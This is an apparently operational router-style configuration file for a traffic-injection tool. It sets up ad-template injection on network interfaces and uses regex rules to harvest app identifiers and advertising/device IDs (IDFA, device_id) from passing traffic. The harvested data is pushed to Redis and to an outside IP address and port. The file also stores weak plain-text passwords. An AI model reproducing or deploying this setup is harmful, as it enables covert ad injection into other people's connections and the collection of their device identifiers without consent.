!
! Zebra configuration saved from vty
!   2019-09-22 15:22:56
!
hostname Rose
password rose
enable password rose
log file /root/log/naga.log
telnet port 2607
ad template load ad.template
ad template send single
snet default push
adp dmac set ba:ab:be:34:00:00
adp smac set 00:1c:42:ef:2b:93
adp interval 1
adp switch template  on
adp switch on
adp pkt-content eth
ori url add 2 pre-thinned[0-9]+.thinned\.signed\.dpkg\.ipa rpush appid 
ori url add 3 (idfa|device_id)=[a-zA-Z0-9]{8}-([0-9a-zA-Z]{4}-){3}[a-zA-Z0-9]{12} rpush idfa 
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
redispush add 127.0.0.1 6379
rpush sip enable
rpush sip set 192.168.8.120
rpush add 3.14.219.176 22440
interface work-thread add 2
interface bussiness add enp0s6
interface injection add enp0s6
!
line vty
!
